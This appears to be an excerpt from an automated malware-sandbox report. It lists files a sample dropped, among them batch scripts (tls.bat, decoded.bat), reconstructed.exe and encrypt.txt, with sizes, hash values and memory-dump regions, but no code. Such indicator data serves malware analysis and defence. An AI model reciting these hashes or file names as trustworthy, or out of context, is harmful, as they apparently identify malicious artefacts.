
Filesize
1KB

MD5
3f018cbf76183042f3a4b189d6bbe097

SHA1
143959de8431321c4af1793bd59bb193490aa2b3

SHA256
8dcf6ec6ee6ff8e10352fcb3e09f3ead89d9200f1660e6a969097f3483afb47e

SHA512
3a6ed260751fed9f2ddba0bb20e767ec0e61665b55eddfe8d00834f7c36b061fc17271bebc9650a75260627deadad4813e013d3d5aaee4aaa6453603aff99d50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
670c4920a79e1c12a6c4e8ff4007562b

SHA1
5023e825d4a8af071498411f589f3b25ff335f0f

SHA256
37c4a07c009ffa6061e7ffcec01d0eb2c1a2c7ac94fc3d2208e1bfee6815c92f

SHA512
d717acfd4aea4d2788b06be081c00d97929eadaa97b9144ebc02617837d8c9ffaad30f3bef0a662c560dc2bc98603853af3404120f5ac2430335dda06e7c5bd5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3a2d88c6bee0c833a6ce16080f56716c

SHA1
427a054d09fcb56678762104b3832eb863c3e5d0

SHA256
f7872c51a82990f14e645c096ed957cf440db93bae672ce559cd264373567270

SHA512
70cdc5a1581ca1cf0bd7803358ef98e157e090367421d7657fb900044dbcc1d5e85f3deef8ba10de052e892cdf94438dcb8f16bbfbec198f303ea7e31aeb375a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
181cb065c38e7e8c523bf7d2d4e36a79

SHA1
daf463490aac6e133bc7548183ecdb265e6dddae

SHA256
c20e593d7ac65f8037bb38d64b4763389c8a944c86a132973329b598ea54849a

SHA512
3794f53e7f9058fab6b1384ec68673cbbed452628c8300ae57a1ecd4e29a2c0dbdf3759e08f63cfe4d68258cc06251493d15cec19d798110aa6bbaf461b96202

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
55f5b4415d056cd9177df5288d1c99db

SHA1
7036f03ef0e0c0590906ed4acd74cd198db3126d

SHA256
9db798502d2ff02f27439cd07aa0504fe63578b7d6a11293204e1a5913aae58b

SHA512
001c61170f776377b65b44d90bfbe580aee20d103770191fab1c6afc9b769797ec9155fa50de47846affc4e5ecdffb9ffcffbebf8f11bb724c6470491ceeea16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
631d56c677a80b2571c4f6cd4de7aab8

SHA1
62e6a6c12af2646395ca66be0020b6eb78f21180

SHA256
5f629f10b8b415abe65a443c7930cc8acba0af1bc11f507552d000758c87def6

SHA512
ad398c209373bf500a2446753d75b84186717ec911d16929b24d7aa76393b0ae3843d854e19bc9b7677663ebda5f803d0988d5151b8bedc3f1dca574a9cdb517

Download Submit
C:\Users\Admin\AppData\Local\Temp\EZRA_TEMP\ctestx.txt

Filesize
2KB

MD5
ad24940eb1f75d4f04ebaf6812657fb5

SHA1
f0ee8bb82e11a0c997b044c6d2887ec4cb8d7f93

SHA256
c330aaaf72fc0cfcc57c281120543318e509c388c989f7f1e3c5be56851ecbf5

SHA512
6224960a3df722d8e2c247ef0a65eb10e53cb6380dcf416462689bb932876848fc9e623f18c4dc30c85d039246a85b1ed690fff5a1f99aeb6299ac9443e53eb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\license.txt

Filesize
20B

MD5
2700cf40284e7e18ebb5ea386ffcbcdd

SHA1
a0f2d6f2dab63bb8316e36582c9313328b8a2f3f

SHA256
5f23113bfd2f85899241845fc6da3bcf383f39c03a93f04bde8d6e907505653b

SHA512
8b583d7ce8e2c8e2cf752d79249f8ffebbc3e4eefe8a846019ea153aca09c1aa295256e2b5ad2e5b532a7696efe34179dd7e23ef31850246b1e9ec48d1196a40

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tls.bat

Filesize
6KB

MD5
d33c73445cbde9f6b1f05d117b2b69d1

SHA1
996e1a27d5ac674699498f2e790d1873dd27de5d

SHA256
fd3c3705088703b49b821dcd93e6006830c4cf87e520669082c58e1dd8ed72c7

SHA512
7ab42563ac3984672cffa34161a8662b491f8f6c8b07dde21ee0a6a968dabd2e9b10300f75d7104fc20cc32fe33d4ad849bdebb9ad02ae1d4f554895cb554779

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cpk5ljhk.dmx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\screenshot.png

Filesize
184KB

MD5
241f0ed10eda192d2cb6f779b022190c

SHA1
2004c556957541efd38d7ca8a261f183c17ef60a

SHA256
d3117fac23af3270c0bb06f309cbe96d9190fac613fa6bd06b08a594e258fd8b

SHA512
5521108e7c62221575b9c70f67d0a477a67b865e68a97dc9e2fbd688b8e88a69c64b30d1fb8128a970499cdbfb1312bafa71e0205620500b07af97e2fb69f778

Download Submit
C:\Users\Admin\Documents\encrypt.txt

Filesize
426KB

MD5
89e0ac409c43bd674874192e1ffbaee4

SHA1
dd347cf21abcfa773354bb8758c76a1265460b14

SHA256
b3375ebe8d87f78254ca93bbd3624b70fbee31135bd942fb4c197b17202e21d3

SHA512
9803ba65e5a4d70a51e5ec46f360250f3f783703c0090715d3b0c81a63528c4b9007eaa7e6a44db03ad64f3875e8be2f14e79c00d42652b1c08d4402fe7b7997

Download Submit
C:\Users\Admin\Documents\reconstructed.exe

Filesize
320KB

MD5
7c7cb8c5f0d143ca8f4505f833323a79

SHA1
86aeb690c0ba18c83b6f8bcd55e0d37f5ca838b5

SHA256
3875ab6f198df0b4388b2eaec822e49ad2e184cb0afdf3192b356cd7d9be35b4

SHA512
471a55263ff2ca1ee1791c2c7287424633945b5df72ee8c4ba003a2e65d605638761cfce560087f391db29a088a95667bd50702433e7d9d135be51244d4f48c1

Download Submit
C:\decoded.bat

Filesize
7KB

MD5
95f5e443d516292e66736152029a4a30

SHA1
5c437bafdfabaa1317e482c90690b18a95f040d9

SHA256
2d83f759816f0c9fdce6db71e0ae612a47370c701f1f49339d95d4d70d13ca90

SHA512
549c54846976e04d99f0cf2c13c49d624793a0143a52cdf7dcfe4b5d5c82d5920d5ccbf2972784f1e2a99636b7bbef5ce0ad4f17beb8bd14e83d3315ed8efc94

Download Submit
memory/1460-120-0x0000000000250000-0x00000000002A6000-memory.dmp

Filesize
344KB

Download
memory/1460-123-0x0000000005FA0000-0x0000000006032000-memory.dmp

Filesize
584KB

Download
memory/1460-124-0x00000000065F0000-0x0000000006B96000-memory.dmp

Filesize
5.6MB

Download
memory/1460-126-0x00000000064A0000-0x0000000006506000-memory.dmp

Filesize
408KB

Download
memory/2320-45-0x0000021FFB8D0000-0x0000021FFBDF8000-memory.dmp

Filesize
5.2MB

Download
memory/2320-44-0x0000021FFB1D0000-0x0000021FFB392000-memory.dmp

Filesize
1.8MB

Download
memory/3228-15-0x00007FFE41160000-0x00007FFE41C22000-memory.dmp

Filesize
10.8MB

Download
memory/3228-14-0x00007FFE41160000-0x00007FFE41C22000-memory.dmp

Filesize
10.8MB

Download
memory/3228-4-0x00000156ECF00000-0x00000156ECF22000-memory.dmp

Filesize
136KB

Download
memory/3228-16-0x00007FFE41160000-0x00007FFE41C22000-memory.dmp

Filesize
10.8MB

Download
memory/3228-3-0x00007FFE41163000-0x00007FFE41165000-memory.dmp

Filesize
8KB

Download
memory/3228-20-0x00007FFE41160000-0x00007FFE41C22000-memory.dmp

Filesize
10.8MB

Download